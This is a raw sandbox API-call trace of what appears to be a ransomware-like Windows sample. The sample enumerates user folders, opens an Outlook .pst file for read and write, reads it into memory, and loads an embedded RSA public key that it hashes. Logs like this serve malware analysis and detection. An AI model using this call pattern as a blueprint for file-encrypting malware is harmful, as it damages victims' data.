[0059.407] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0059.407] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0059.407] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.407] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.407] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.407] PathFindFileNameW (pszPath="") returned="" [0059.407] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0059.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0059.407] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.407] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.407] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0059.407] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0059.408] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.408] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.408] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.408] PathFindFileNameW (pszPath="") returned="" [0059.408] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.408] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.408] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0059.408] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned=".pst" [0059.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.408] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=271360) returned 1 [0059.408] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.411] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.411] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.412] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.412] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x25805, lpOverlapped=0x0) returned 1 [0059.414] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.414] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.414] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.414] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0059.415] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.415] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.415] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.415] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.415] GetLastError () returned 0x0 [0059.415] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.415] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0059.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.415] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.415] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.415] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25810) returned 0x9c88ae8 [0059.417] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87d88 [0059.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b670 [0059.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87dd0 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b688 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6b8 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6d0 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.418] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6b8 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6d0 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b6b8 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6b8 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.419] GetCurrentThreadId () returned 0x9e0 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c83ba8 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.419] GetCurrentThreadId () returned 0x9e0 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6b8 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6d0 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6a0 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6e8 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6b8 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6b8 [0059.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6b8 | out: hHeap=0x660000) returned 1 [0059.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6a0 | out: hHeap=0x660000) returned 1 [0059.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b688 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87dd0 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 